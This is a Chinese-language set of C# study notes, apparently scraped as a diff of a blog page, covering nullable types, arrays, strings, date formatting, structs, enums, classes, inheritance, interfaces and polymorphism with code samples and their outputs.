        }
    }
}

Output:
Values of the nullable types: , 45, , 3.14157
A nullable boolean value:
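
A nullable value can be inspected safely through HasValue and Value (or GetValueOrDefault); a small sketch, my addition:

using System;

class NullableSketch
{
    static void Main()
    {
        int? num = null;

        // HasValue is false while num holds null; reading .Value now would throw
        Console.WriteLine(num.HasValue);            // False
        Console.WriteLine(num.GetValueOrDefault()); // 0

        num = 45;
        if (num.HasValue)
        {
            Console.WriteLine(num.Value);           // 45
        }
    }
}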

The Null Coalescing Operator (??)

The null coalescing operator defines a default value for nullable and reference types: it supplies a preset value to fall back on in case the nullable value is null.

using System;
namespace CalculatorApplication
{
    class NullablesAtShow
    {
        static void Main(string[] args)
        {
            double? num1 = null;
            double? num2 = 3.14157;
            double num3;

            num3 = num1 ?? 5.34; // returns 5.34 if num1 is null
            Console.WriteLine("Value of num3: {0}", num3);

            num3 = num2 ?? 5.34;
            Console.WriteLine("Value of num3: {0}", num3);
            Console.ReadLine();
        }
    }
}

Output:
Value of num3: 5.34
Value of num3: 3.14157

?? can be read as a shorthand form of the ternary operator:

num3 = num1 ?? 5.34;
num3 = (num1 == null) ? 5.34 : (double)num1; // the cast is needed because num1 is double?

C# Arrays (Array)

using System;
namespace ArrayApplication
{
    class MyArray
    {
        static void Main(string[] args)
        {
            int[] n = new int[10]; /* n is an array of 10 integers */
            int i, j;

            /* initialize the elements of array n */
            for (i = 0; i < 10; i++)
            {
                n[i] = i + 100;
            }

            /* output the value of each array element */
            for (j = 0; j < 10; j++)
            {
                Console.WriteLine("Element[{0}] = {1}", j, n[j]);
            }
            Console.ReadKey();
        }
    }
}

A two-dimensional array:

using System;

namespace TwoDimensionalArrayExample
{
    class Program
    {
        static void Main(string[] args)
        {
            // define a two-dimensional array with 3 rows and 4 columns
            int[,] array = new int[3, 4];

            // initialize the elements with nested loops
            for (int i = 0; i < 3; i++)
            {
                for (int j = 0; j < 4; j++)
                {
                    array[i, j] = i * j; // example: row index times column index
                }
            }

            /* it can also be initialized directly:
            int[,] array =
            {
                { 1, 2, 3, 4 },
                { 5, 6, 7, 8 },
                { 9, 10, 11, 12 }
            };
            */

            // print the array elements
            for (int i = 0; i < 3; i++)
            {
                for (int j = 0; j < 4; j++)
                {
                    Console.Write(array[i, j] + "\t");
                }
                Console.WriteLine();
            }
        }
    }
}

C# Multidimensional Arrays

The two-dimensional array in C# is a different concept from two-dimensional arrays in C/C++, Java, and similar languages; a C# two-dimensional array is more like a matrix:

int[,] a = new int[3, 4] {
    { 0, 1, 2, 3 },   /* initialize the row with index 0 */
    { 4, 5, 6, 7 },   /* initialize the row with index 1 */
    { 8, 9, 10, 11 }  /* initialize the row with index 2 */
};

Coming to C# from another language, it is easy to confuse this with the concept of jagged arrays (a contrasting sketch follows the jagged-array examples below).

C# Jagged Arrays

A jagged array is an array of arrays. For example, you can declare a jagged array of int named scores:

int[][] scores;

Declaring an array does not create the array in memory. To create the array above:

int[][] scores = new int[5][];
for (int i = 0; i < scores.Length; i++)
{
    scores[i] = new int[4];
}

You can initialize a jagged array as follows:

int[][] scores = new int[2][] { new int[] { 92, 93, 94 }, new int[] { 85, 66, 87, 88 } };
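
To make the confusion mentioned earlier concrete, here is a small side-by-side sketch (my addition): the rectangular int[,] is one block where every row has the same width, while the jagged int[][] is an array of independent arrays whose rows may differ in length:

using System;

class ArrayContrast
{
    static void Main()
    {
        // Rectangular: a single 2x3 block, every row has exactly 3 columns
        int[,] rect = { { 1, 2, 3 }, { 4, 5, 6 } };
        Console.WriteLine(rect.Length);      // 6 (total number of elements)
        Console.WriteLine(rect[1, 2]);       // 6

        // Jagged: an array of 2 arrays, each row sized independently
        int[][] jagged = new int[][] { new int[] { 1, 2, 3 }, new int[] { 4, 5 } };
        Console.WriteLine(jagged.Length);    // 2 (number of rows)
        Console.WriteLine(jagged[1].Length); // 2 (length of the second row)
        Console.WriteLine(jagged[1][1]);     // 5
    }
}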

C# Passing Arrays to Functions

In C#, you can pass an array as an argument to a function: specifying the array's name without an index passes a reference to the array.

The following example demonstrates how to pass an array to a function:

using System;

namespace ArrayApplication
{
    class MyArray
    {
        double getAverage(int[] arr, int size)
        {
            int i;
            double avg;
            int sum = 0;

            for (i = 0; i < size; ++i)
            {
                sum += arr[i];
            }

            avg = (double)sum / size;
            return avg;
        }

        static void Main(string[] args)
        {
            MyArray app = new MyArray();
            /* an int array with 5 elements */
            int[] balance = new int[] { 1000, 2, 3, 17, 50 };
            double avg;

            /* pass the array as an argument */
            avg = app.getAverage(balance, 5);

            /* output the returned value */
            Console.WriteLine("The average is: {0} ", avg);
            Console.ReadKey();
        }
    }
}
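
One consequence worth remembering: an array is a reference type, so a method receives a reference to the same array and can modify the caller's elements. A hedged sketch (names illustrative, not from the tutorial):

using System;

class ArrayRefSketch
{
    static void Double(int[] arr)
    {
        for (int i = 0; i < arr.Length; i++)
        {
            arr[i] *= 2; // mutates the caller's array
        }
    }

    static void Main()
    {
        int[] data = { 1, 2, 3 };
        Double(data);
        Console.WriteLine(string.Join(", ", data)); // 2, 4, 6
    }
}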

C# Strings (String)

                                • C# 结构体(Struct) | 菜鸟教程 (runoob.com)

An example that builds strings in several ways and formats a DateTime:

using System;

namespace StringApplication
{
    class Program
    {
        static void Main(string[] args)
        {
            // strings and string concatenation
            string fname, lname;
            fname = "Rowan";
            lname = "Atkinson";

            string fullname = fname + lname;
            Console.WriteLine("Full Name: {0}", fullname);

            // via the string constructor
            char[] letters = { 'H', 'e', 'l', 'l', 'o' };
            string greetings = new string(letters);
            Console.WriteLine("Greetings: {0}", greetings);

            // a method that returns a string
            string[] sarray = { "Hello", "From", "Tutorials", "Point" };
            string message = String.Join(" ", sarray);
            Console.WriteLine("Message: {0}", message);

            // a formatting method that converts a value
            DateTime waiting = new DateTime(2012, 10, 10, 17, 58, 1);
            string chat = String.Format("Message sent at {0:t} on {0:D}",
                                        waiting);
            Console.WriteLine("Message: {0}", chat);
            Console.ReadKey();
        }
    }
}

Output:
Full Name: RowanAtkinson
Greetings: Hello
Message: Hello From Tutorials Point
Message: Message sent at 17:58 on 2012年10月10日

The {0:D} long-date output follows the locale the program ran under, here Chinese.

Properties of the String Class

Length: gets the number of characters in the current String object.
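
A one-line sketch of the Length property (my addition):

using System;

class LengthSketch
{
    static void Main()
    {
        string s = "Hello";
        Console.WriteLine(s.Length); // 5
    }
}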

Methods of the String Class

Comparing Strings

String.Compare()

See "Difference between == and compare() for C++ string?" (码农家园, codenong.com) — for this case, String.Compare() and == seem to make little practical difference.
using System;

namespace StringApplication
{
    class StringProg
    {
        static void Main(string[] args)
        {
            string str1 = "This is test";
            string str2 = "This is test";

            if (String.Compare(str1, str2) == 0)
            {
                Console.WriteLine(str1 + " and " + str2 + " are equal.");
            }
            else
            {
                Console.WriteLine(str1 + " and " + str2 + " are not equal.");
            }

            Console.ReadKey();
        }
    }
}

Output:
This is test and This is test are equal.
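
For plain equality, == (which performs value equality on strings, like String.Equals) is usually enough; String.Compare additionally reports ordering as a negative/zero/positive int. A small sketch, my addition:

using System;

class CompareSketch
{
    static void Main()
    {
        string a = "apple";
        string b = "banana";

        Console.WriteLine(a == "apple");             // True (value equality)
        Console.WriteLine(a.Equals("apple"));        // True
        Console.WriteLine(String.Compare(a, b) < 0); // True ("apple" sorts before "banana")
    }
}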

Checking Whether a String Contains a Substring

Contains()

using System;

namespace StringApplication
{
    class StringProg
    {
        static void Main(string[] args)
        {
            string str = "This is test";
            if (str.Contains("test"))
            {
                Console.WriteLine("The sequence 'test' was found.");
            }
            Console.ReadKey();
        }
    }
}

Output:
The sequence 'test' was found.

Getting a Substring

                                Substring()

using System;
namespace StringApplication
{
    class StringProg
    {
        static void Main(string[] args)
        {
            string str = "01234567890123456789";
            Console.WriteLine(str);
            string substr = str.Substring(10);
            Console.WriteLine(substr);
            Console.ReadKey();
        }
    }
}

Output:

01234567890123456789
0123456789
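
Substring also has a two-argument overload that takes a start index and a length; a short sketch building on the string above:

string str = "01234567890123456789";
// Take 5 characters starting at index 10
Console.WriteLine(str.Substring(10, 5)); // 01234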
Joining strings

                                Join()

using System;

namespace StringApplication
{
    class StringProg
    {
        static void Main(string[] args)
        {
            string[] starray = new string[]{"Down the way nights are dark",
                "And the sun shines daily on the mountain top",
                "I took a trip on a sailing ship",
                "And when I reached Jamaica",
                "I made a stop"};

            string str = String.Join("\n", starray);
            Console.WriteLine(str);
            Console.ReadKey();
        }
    }
}

Output:

Down the way nights are dark
And the sun shines daily on the mountain top
I took a trip on a sailing ship
And when I reached Jamaica
I made a stop

Formatting dates with string.Format

DateTime dt = new DateTime(2017, 4, 1, 13, 16, 32, 108);
string.Format("{0:y yy yyy yyyy}", dt); // 17 17 2017 2017
string.Format("{0:M MM MMM MMMM}", dt); // 4 04 四月 四月
string.Format("{0:d dd ddd dddd}", dt); // 1 01 周六 星期六
string.Format("{0:t tt}", dt); // 下 下午
string.Format("{0:H HH}", dt); // 13 13
string.Format("{0:h hh}", dt); // 1 01
string.Format("{0:m mm}", dt); // 16 16
string.Format("{0:s ss}", dt); // 32 32
string.Format("{0:F FF FFF FFFF FFFFF FFFFFF FFFFFFF}", dt); // 1 1 108 108 108 108 108
string.Format("{0:f ff fff ffff fffff ffffff fffffff}", dt); // 1 10 108 1080 10800 108000 1080000
string.Format("{0:z zz zzz}", dt); // +8 +08 +08:00

string.Format("{0:yyyy/MM/dd HH:mm:ss.fff}", dt); // 2017/04/01 13:16:32.108
string.Format("{0:yyyy/MM/dd dddd}", dt); // 2017/04/01 星期六
string.Format("{0:yyyy/MM/dd dddd tt hh:mm}", dt); // 2017/04/01 星期六 下午 01:16
string.Format("{0:yyyyMMdd}", dt); // 20170401
string.Format("{0:yyyy-MM-dd HH:mm:ss.fff}", dt); // 2017-04-01 13:16:32.108

Besides string.Format(), .ToString() can be used to format dates with exactly the same effect:

DateTime dt = new DateTime(2017, 4, 1, 13, 16, 32, 108);
dt.ToString("y yy yyy yyyy"); // 17 17 2017 2017
dt.ToString("M MM MMM MMMM"); // 4 04 四月 四月
dt.ToString("d dd ddd dddd"); // 1 01 周六 星期六
dt.ToString("t tt"); // 下 下午
dt.ToString("H HH"); // 13 13
dt.ToString("h hh"); // 1 01
dt.ToString("m mm"); // 16 16
dt.ToString("s ss"); // 32 32
dt.ToString("F FF FFF FFFF FFFFF FFFFFF FFFFFFF"); // 1 1 108 108 108 108 108
dt.ToString("f ff fff ffff fffff ffffff fffffff"); // 1 10 108 1080 10800 108000 1080000
dt.ToString("z zz zzz"); // +8 +08 +08:00

dt.ToString("yyyy/MM/dd HH:mm:ss.fff"); // 2017/04/01 13:16:32.108
dt.ToString("yyyy/MM/dd dddd"); // 2017/04/01 星期六
dt.ToString("yyyy/MM/dd dddd tt hh:mm"); // 2017/04/01 星期六 下午 01:16
dt.ToString("yyyyMMdd"); // 20170401
dt.ToString("yyyy-MM-dd HH:mm:ss.fff"); // 2017-04-01 13:16:32.108

C# Structs (Struct)

In C#, a struct is a value type used to organize and store related data: a single variable can hold related fields of different data types.

using System;
using System.Text;

struct Books
{
    public string title;
    public string author;
    public string subject;
    public int book_id;
};

public class testStructure
{
    public static void Main(string[] args)
    {
        /* Declare Book1 of type Books */
        Books Book1;
        /* Declare Book2 of type Books */
        Books Book2;

        /* Book 1 details */
        Book1.title = "C Programming";
        Book1.author = "Nuha Ali";
        Book1.subject = "C Programming Tutorial";
        Book1.book_id = 6495407;

        /* Book 2 details */
        Book2.title = "Telecom Billing";
        Book2.author = "Zara Ali";
        Book2.subject = "Telecom Billing Tutorial";
        Book2.book_id = 6495700;

        /* Print Book1 info */
        Console.WriteLine("Book 1 title : {0}", Book1.title);
        Console.WriteLine("Book 1 author : {0}", Book1.author);
        Console.WriteLine("Book 1 subject : {0}", Book1.subject);
        Console.WriteLine("Book 1 book_id : {0}", Book1.book_id);

        /* Print Book2 info */
        Console.WriteLine("Book 2 title : {0}", Book2.title);
        Console.WriteLine("Book 2 author : {0}", Book2.author);
        Console.WriteLine("Book 2 subject : {0}", Book2.subject);
        Console.WriteLine("Book 2 book_id : {0}", Book2.book_id);

        Console.ReadKey();
    }
}

Output:

Book 1 title : C Programming
Book 1 author : Nuha Ali
Book 1 subject : C Programming Tutorial
Book 1 book_id : 6495407
Book 2 title : Telecom Billing
Book 2 author : Zara Ali
Book 2 subject : Telecom Billing Tutorial
Book 2 book_id : 6495700

Classes vs. Structs

Classes and structs call for different design considerations: classes suit complex objects and behavior, with support for inheritance and polymorphism, while structs suit lightweight data and value semantics, improving performance and avoiding the overhead of managing references.

The basic differences between classes and structs are:

                                @@ -905,22 +903,22 @@

Classes vs. structs by example

In the following example, MyStruct is a struct and MyClass is a class.

The commented-out parts show that a struct cannot have a parameterless constructor, cannot inherit, and that copying a struct instance copies the entire contents of the struct. A class, in contrast, can have a parameterless constructor, supports inheritance, and copying an instance copies only the reference.

(Classes here behave a bit like Python objects: if you want modifying one instance to leave other instances untouched, as with a struct, you have to define something like a .copy() method on the class yourself.)

using System;

// Struct declaration
struct MyStruct
{
    public int X;
    public int Y;

    // A struct cannot have a parameterless constructor (before C# 10)
    // public MyStruct()
    // {
    // }

    // Parameterized constructor
    // CS0171: field 'MyStruct.Y' must be fully assigned before control is
    // returned to the caller; language version 11.0+ auto-defaults fields
    public MyStruct(int x, int y)
    {
        X = x;
        Y = y;
    }

    // A struct cannot inherit
    // struct MyDerivedStruct : MyBaseStruct
    // {
    // }
}

// Class declaration
class MyClass
{
    public int X;
    public int Y;

    // A class can have a parameterless constructor
    public MyClass()
    {
    }

    // Parameterized constructor
    public MyClass(int x, int y)
    {
        X = x;
        Y = y;
    }

    // Classes support inheritance
    // class MyDerivedClass : MyBaseClass
    // {
    // }

    public MyClass ShallowCopy()
    {
        return (MyClass)this.MemberwiseClone();
    }
}

class Program
{
    static void Main()
    {
        // A struct is a value type, allocated on the stack
        MyStruct structInstance1 = new MyStruct(1, 2);
        MyStruct structInstance2 = structInstance1; // copies the whole struct

        // A class is a reference type, allocated on the heap
        MyClass classInstance1 = new MyClass(3, 4);
        MyClass classInstance2 = classInstance1; // copies the reference: same object
        MyClass classInstance3 = classInstance1.ShallowCopy(); // shallow copy: a different object

        // Modifying a struct instance does not affect other instances
        structInstance1.X = 5;
        Console.WriteLine($"Struct: {structInstance1.X}, {structInstance2.X}");

        // Modifying a class instance affects every reference to the same object
        classInstance1.X = 6;
        Console.WriteLine($"Class: {classInstance1.X}, {classInstance2.X}, {classInstance3.X}");
    }
}

Output:

Struct: 5, 1
Class: 6, 6, 3

C# Enums (Enum)

Each symbol in an enumeration list stands for an integer value, one greater than the symbol that precedes it. By default the first enum symbol has the value 0, but you can also set the values yourself.

using System;

public class EnumTest
{
    enum Day { Sun = 1, Mon = 3, Tue, Wed, Thu, Fri = 9, Sat };

    static void Main()
    {
        Console.WriteLine("Sun = {0}, Mon = {1}, Tue = {2}, Wed = {3}, Thu = {4}, Fri = {5}, Sat = {6}",
            (int)Day.Sun, (int)Day.Mon, (int)Day.Tue, (int)Day.Wed, (int)Day.Thu, (int)Day.Fri, (int)Day.Sat);
    }
}

Output:

Sun = 1, Mon = 3, Tue = 4, Wed = 5, Thu = 6, Fri = 9, Sat = 10
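
Because each symbol is just an integer underneath, you can convert between the enum and its underlying value in both directions; a small sketch reusing the Day enum above (placed inside EnumTest.Main, where Day is visible):

Day d = (Day)5;                  // cast an int back to the enum
Console.WriteLine(d);            // Wed
Console.WriteLine((int)Day.Sat); // 10
Day parsed = (Day)Enum.Parse(typeof(Day), "Fri"); // parse from the symbol name
Console.WriteLine((int)parsed);  // 9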

C# Classes (Class)

Class definition

A class definition starts with the keyword class followed by the class name; the class body is enclosed in a pair of braces. The general form of a class definition is:

<access specifier> class class_name
{
    // member variables
    <access specifier> <data type> variable1;
    <access specifier> <data type> variable2;
    ...
    <access specifier> <data type> variableN;
    // member methods
    <access specifier> <return type> method1(parameter_list)
    {
        // method body
    }
    <access specifier> <return type> method2(parameter_list)
    {
        // method body
    }
    ...
    <access specifier> <return type> methodN(parameter_list)
    {
        // method body
    }
}
• The access specifier <access specifier> defines the access rules for the class and its members. If none is specified, the defaults apply: internal for the class, private for its members.
@@ -933,8 +931,8 @@

A member function of a class is a function whose definition or prototype appears within the class definition, like any other member. As a member, it can operate on any object of its class and can access all members of the class for that object.

Member variables are attributes of an object (from the design point of view) and are kept private to implement encapsulation. They can only be accessed through public member functions.

Let's use these concepts to set and get the values of different members of a class:

using System;
namespace BoxApplication
{
    class Box
    {
        private double length;
        private double breadth;
        private double height;

        public void setLength(double len)
        {
            length = len;
        }

        public void setBreadth(double bre)
        {
            breadth = bre;
        }

        public void setHeight(double hei)
        {
            height = hei;
        }

        public double getVolume()
        {
            return length * breadth * height;
        }
    }

    class Boxtester
    {
        static void Main(string[] args)
        {
            Box Box1 = new Box(); // declare Box1 of type Box
            Box Box2 = new Box(); // declare Box2 of type Box
            double volume;        // volume

            // Box1 specification
            Box1.setLength(6.0);
            Box1.setBreadth(7.0);
            Box1.setHeight(5.0);

            // Box2 specification
            Box2.setLength(12.0);
            Box2.setBreadth(13.0);
            Box2.setHeight(10.0);

            // Volume of Box1
            volume = Box1.getVolume();
            Console.WriteLine("Volume of Box1 : {0}", volume);

            // Volume of Box2
            volume = Box2.getVolume();
            Console.WriteLine("Volume of Box2 : {0}", volume);

            Console.ReadKey();
        }
    }
}

Output:

Volume of Box1 : 210
Volume of Box2 : 1560
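
In modern C#, this setLength/getVolume pattern is usually written with properties instead of explicit setter methods; a minimal alternative sketch (not the tutorial's version):

class Box
{
    // Auto-implemented properties replace the private fields plus set methods
    public double Length { get; set; }
    public double Breadth { get; set; }
    public double Height { get; set; }

    public double GetVolume()
    {
        return Length * Breadth * Height;
    }
}

// Usage: Box b = new Box { Length = 6.0, Breadth = 7.0, Height = 5.0 };
//        Console.WriteLine(b.GetVolume()); // 210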

Constructors in C#

A class's constructor is a special member function of the class that is executed whenever a new object of the class is created.

A constructor has exactly the same name as the class, and it has no return type.
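
The example that originally followed here is elided in this diff; as a stand-in, a minimal sketch of a class with both a parameterless and a parameterized constructor (the Line class and its members are illustrative, not from the original):

using System;

class Line
{
    private double length;

    // Parameterless constructor: same name as the class, no return type
    public Line()
    {
        Console.WriteLine("Object is being created");
    }

    // Parameterized constructor
    public Line(double len)
    {
        length = len;
    }

    public double GetLength()
    {
        return length;
    }
}

// Line line = new Line(6.0);            // this overload prints nothing
// Console.WriteLine(line.GetLength());  // 6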

                                  @@ -947,8 +945,8 @@

using System;
namespace StaticVarApplication
{
    class StaticVar
    {
        public static int num;

        public void count()
        {
            num++;
        }

        public static int getNum()
        {
            return num;
        }
    }

    class StaticTester
    {
        static void Main(string[] args)
        {
            StaticVar s = new StaticVar();
            s.count();
            s.count();
            s.count();
            Console.WriteLine("Variable num: {0}", StaticVar.getNum());
            Console.ReadKey();
        }
    }
}

Output:

Variable num: 3

C# Inheritance

• C# 继承 | 菜鸟教程 (runoob.com)

@@ -961,17 +959,17 @@

C# does not support multiple inheritance for classes, but it does support multiple inheritance of interfaces: a class can implement several interfaces.

In short: a class can implement any number of interfaces, but can inherit from only one class.
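
A quick sketch of that rule, with illustrative names: at most one base class, any number of interfaces, and the base class must come first in the list:

interface IA { void A(); }
interface IB { void B(); }
class BaseClass { }

// One base class, multiple interfaces
class Derived : BaseClass, IA, IB
{
    public void A() { }
    public void B() { }
}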

The syntax for creating a derived class in C# is:

<access specifier> class <base class>
{
    ...
}
class <derived class> : <base class>
{
    ...
}

A derived class inherits the base class's members (fields, methods, properties, and so on); members marked private are inherited but are not accessible from the derived class.

A derived class can call the base class's constructors and methods through the keyword base.

Initializing the base class

                                    -
                                    using System;
                                    namespace RectangleApplication
                                    {
                                    class Rectangle
                                    {
                                    // 成员变量
                                    protected double length;
                                    protected double width;
                                    public Rectangle(double l, double w)
                                    {
                                    length = l;
                                    width = w;
                                    }
                                    public double GetArea()
                                    {
                                    return length * width;
                                    }
                                    public void Display()
                                    {
                                    Console.WriteLine("长度: {0}", length);
                                    Console.WriteLine("宽度: {0}", width);
                                    Console.WriteLine("面积: {0}", GetArea());
                                    }
                                    }//end class Rectangle
                                    class Tabletop : Rectangle
                                    {
                                    private double cost;
                                    public Tabletop(double l, double w) : base(l, w)
                                    { }
                                    public double GetCost()
                                    {
                                    double cost;
                                    cost = GetArea() * 70;
                                    return cost;
                                    }
                                    public void Display()
                                    {
                                    base.Display();
                                    Console.WriteLine("成本: {0}", GetCost());
                                    }
                                    }
                                    class ExecuteRectangle
                                    {
                                    static void Main(string[] args)
                                    {
                                    Tabletop t = new Tabletop(4.5, 7.5);
                                    t.Display();
                                    Console.ReadLine();
                                    }
                                    }
                                    }
                                    -
                                    长度: 4.5
                                    宽度: 7.5
                                    面积: 33.75
                                    成本: 2362.5
                                    +
                                    1
                                    2
                                    3
                                    4
                                    5
                                    6
                                    7
                                    8
                                    9
                                    10
                                    11
                                    12
                                    13
                                    14
                                    15
                                    16
                                    17
                                    18
                                    19
                                    20
                                    21
                                    22
                                    23
                                    24
                                    25
                                    26
                                    27
                                    28
                                    29
                                    30
                                    31
                                    32
                                    33
                                    34
                                    35
                                    36
                                    37
                                    38
                                    39
                                    40
                                    41
                                    42
                                    43
                                    44
                                    45
                                    46
                                    47
                                    48
                                    49
                                    50
                                    51
using System;
namespace RectangleApplication
{
    class Rectangle
    {
        // member variables
        protected double length;
        protected double width;
        public Rectangle(double l, double w)
        {
            length = l;
            width = w;
        }
        public double GetArea()
        {
            return length * width;
        }
        public void Display()
        {
            Console.WriteLine("Length: {0}", length);
            Console.WriteLine("Width: {0}", width);
            Console.WriteLine("Area: {0}", GetArea());
        }
    } // end class Rectangle
    class Tabletop : Rectangle
    {
        public Tabletop(double l, double w) : base(l, w)
        { }
        public double GetCost()
        {
            double cost;
            cost = GetArea() * 70;
            return cost;
        }
        // 'new' makes the hiding of Rectangle.Display explicit (avoids compiler warning CS0108)
        public new void Display()
        {
            base.Display();
            Console.WriteLine("Cost: {0}", GetCost());
        }
    }
    class ExecuteRectangle
    {
        static void Main(string[] args)
        {
            Tabletop t = new Tabletop(4.5, 7.5);
            t.Display();
            Console.ReadLine();
        }
    }
}
Length: 4.5
Width: 7.5
Area: 33.75
Cost: 2362.5

The Display() defined by Tabletop hides the Display() defined by Rectangle (the base method is not virtual, so this is method hiding rather than overriding, which is why the example marks it with new); without the base.Display(); statement, Rectangle.Display() would never execute.
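To see the difference between hiding and overriding in isolation, here is a minimal sketch (Animal and Dog are hypothetical names, not part of the example above): a method hidden with new is bound from the variable's compile-time type, while an overridden virtual method is bound from the object's run-time type.

using System;

class Animal
{
    public void Eat() { Console.WriteLine("Animal.Eat"); }             // non-virtual
    public virtual void Speak() { Console.WriteLine("Animal.Speak"); } // virtual
}

class Dog : Animal
{
    public new void Eat() { Console.WriteLine("Dog.Eat"); }          // hides Animal.Eat
    public override void Speak() { Console.WriteLine("Dog.Speak"); } // overrides Animal.Speak
}

class HidingDemo
{
    static void Main(string[] args)
    {
        Animal a = new Dog();
        a.Eat();   // prints "Animal.Eat" — hiding: resolved from the static type Animal
        a.Speak(); // prints "Dog.Speak"  — overriding: resolved from the runtime type Dog
    }
}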

Interface Inheritance

An interface can inherit from one or more other interfaces, and the derived interface inherits all the members of its base interfaces.

A derived interface can extend the member list of its base interfaces, but it cannot change their access modifiers.

using System;

// Define a base interface
interface IBaseInterface
{
    void Method1();
}

// Define a derived interface that inherits from the base interface (interfaces can inherit, too)
interface IDerivedInterface : IBaseInterface
{
    void Method2();
}

// A class implementing the derived interface (it must implement every inherited member, or compilation fails)
class MyClass : IDerivedInterface
{
    public void Method1()
    {
        Console.WriteLine("Method1 implementation");
    }

    public void Method2()
    {
        Console.WriteLine("Method2 implementation");
    }
}

class Program
{
    static void Main(string[] args)
    {
        // Create an instance of MyClass
        MyClass obj = new MyClass();

        // Call the method inherited from the base interface
        obj.Method1();

        // Call the method added by the derived interface
        obj.Method2();
    }
}

Interfaces and classes play clearly different roles in object-oriented programming:

1. Definition and purpose: an interface defines a contract, declaring member signatures without state, while a class provides the state and behavior that fulfil such contracts and can be instantiated (a rough sketch follows below).
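As a rough sketch of that difference (IShape and Circle are hypothetical names): the interface below is a pure contract, while the class carries state, construction, and the actual implementation.

using System;

// The interface declares only signatures: no fields, no constructors,
// no method bodies (default interface implementations in C# 8+ aside).
interface IShape
{
    double Area();
}

// The class holds state (the field), defines construction, and implements the behavior.
class Circle : IShape
{
    private readonly double radius;
    public Circle(double radius) { this.radius = radius; }
    public double Area() { return Math.PI * radius * radius; }
}

class InterfaceVsClassDemo
{
    static void Main(string[] args)
    {
        IShape s = new Circle(2.0); // you instantiate the class, never the interface
        Console.WriteLine("Area: {0}", s.Area());
    }
}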


C# Multiple Inheritance

For multiple inheritance in C++, see: C++(23)——理解多重继承(菱形继承、半圆形继承)、虚基类和虚继承_c++23-CSDN博客

Multiple inheritance means that a class can inherit behavior and features from more than one parent class at the same time; single inheritance, by contrast, means a class can inherit from only one parent class.

C# does not support multiple inheritance of classes, but you can use interfaces to achieve the same effect (a class cannot derive from more than one base class, yet it can implement any number of interfaces). The following program demonstrates this:

using System;
namespace InheritanceApplication
{
    class Shape
    {
        public void setWidth(int w)
        {
            width = w;
        }
        public void setHeight(int h)
        {
            height = h;
        }
        protected int width;
        protected int height;
    }

    // Interface PaintCost
    public interface PaintCost
    {
        int getPaintCost(int area);
    }

    // Interface FlatCost
    public interface FlatCost
    {
        int getFlatCost(int area);
    }

    // Derived class: one base class plus two interfaces
    class Rectangle : Shape, PaintCost, FlatCost
    {
        public int getArea()
        {
            return (width * height);
        }
        public int getPaintCost(int area)
        {
            return area * 70;
        }
        public int getFlatCost(int area)
        {
            return area * 20;
        }
    }
    class RectangleTester
    {
        static void Main(string[] args)
        {
            Rectangle Rect = new Rectangle();
            int area;
            Rect.setWidth(5);
            Rect.setHeight(7);
            area = Rect.getArea();
            // Print the area and the derived costs
            Console.WriteLine("Total area: {0}", Rect.getArea());
            Console.WriteLine("Total paint cost: ${0}", Rect.getPaintCost(area));
            Console.WriteLine("Flat cost: ${0}", Rect.getFlatCost(area));
            Console.ReadKey();
        }
    }
}
Total area: 35
Total paint cost: $2450
Flat cost: $700

C# Polymorphism

                                      • C# 多态性 | 菜鸟教程 (runoob.com)

Function Overloading

You can give the same function name multiple definitions within the same scope. The definitions must differ from one another in the parameter list: different parameter types, a different number of parameters, or both. You cannot overload function declarations that differ only in their return type.

using System;
namespace PolymorphismApplication
{
    public class TestData
    {
        public int Add(int a, int b, int c)
        {
            return a + b + c;
        }
        public int Add(int a, int b)
        {
            return a + b;
        }
    }
    class Program
    {
        static void Main(string[] args)
        {
            TestData dataClass = new TestData();
            int add1 = dataClass.Add(1, 2);
            int add2 = dataClass.Add(1, 2, 3);

            Console.WriteLine("add1 :" + add1);
            Console.WriteLine("add2 :" + add2);
        }
    }
}
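For reference, running this program prints the results of the two overloads chosen from the argument lists:

add1 :3
add2 :6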

Dynamic Polymorphism

Static polymorphism and dynamic polymorphism are the two ways polymorphism is realized in object-oriented programming. The main difference between them is how the concrete method or function to call is determined: at compile time for static polymorphism, at run time for dynamic polymorphism (a minimal sketch follows).
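Here is that sketch (Calculator, Pet and Cat are hypothetical names for illustration): the Add overload is selected at compile time from the argument list, while the Sound call is dispatched at run time from the object's actual type.

using System;

class Calculator
{
    // Static polymorphism: the compiler picks the overload from the argument types
    public int Add(int a, int b) { return a + b; }
    public double Add(double a, double b) { return a + b; }
}

class Pet
{
    public virtual string Sound() { return "..."; }
}

class Cat : Pet
{
    public override string Sound() { return "Meow"; }
}

class PolymorphismDemo
{
    static void Main(string[] args)
    {
        Calculator c = new Calculator();
        Console.WriteLine(c.Add(1, 2));     // int overload, chosen at compile time
        Console.WriteLine(c.Add(1.5, 2.5)); // double overload, chosen at compile time

        Pet p = new Cat();
        Console.WriteLine(p.Sound());       // "Meow", chosen at run time via virtual dispatch
    }
}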


using System;
namespace PolymorphismApplication
{
    abstract class Shape
    {
        abstract public int area(); // a function marked abstract can only be declared, not given a body
    }

    class Rectangle : Shape
    {
        private int length;
        private int width;
        public Rectangle(int a = 0, int b = 0)
        {
            length = a;
            width = b;
        }
        public override int area() // mark the implementation of an inherited definition with override
        {
            Console.WriteLine("Area of the Rectangle class:");
            return (width * length);
        }
    }

    class RectangleTester
    {
        static void Main(string[] args)
        {
            Rectangle r = new Rectangle(10, 7);
            double a = r.area();
            Console.WriteLine("Area: {0}", a);
            Console.ReadKey();
        }
    }
}
Area of the Rectangle class:
Area: 70

When a function defined in a class needs to be implemented in a derived class, you can use a virtual method (unlike abstract, virtual lets the base class provide a default implementation).


using System;
using System.Collections.Generic;

public abstract class Shape
{
    public int X { get; private set; }
    public int Y { get; private set; }
    public int Height { get; set; }
    public int Width { get; set; }

    // virtual method
    public virtual void Draw()
    {
        Console.WriteLine("Performing the base class drawing task");
    }
}

class Circle : Shape
{
    public override void Draw() // override is used here as well
    {
        Console.WriteLine("Drawing a circle");
        base.Draw();
    }
}
class Rectangle : Shape
{
    public override void Draw()
    {
        Console.WriteLine("Drawing a rectangle");
        base.Draw();
    }
}
class Triangle : Shape
{
    public override void Draw()
    {
        Console.WriteLine("Drawing a triangle");
        base.Draw();
    }
}

class Program
{
    static void Main(string[] args)
    {
        // Create a List<Shape> and add a Circle, a Triangle and a Rectangle to it
        var shapes = new List<Shape>
        {
            new Rectangle(),
            new Triangle(),
            new Circle()
        };

        // Loop over the derived objects in the list and call Draw on each Shape
        foreach (var shape in shapes)
        {
            shape.Draw();
        }

        Console.WriteLine("Press any key to exit.");
        Console.ReadKey();
    }
}
Drawing a rectangle
Performing the base class drawing task
Drawing a triangle
Performing the base class drawing task
Drawing a circle
Performing the base class drawing task
Press any key to exit.

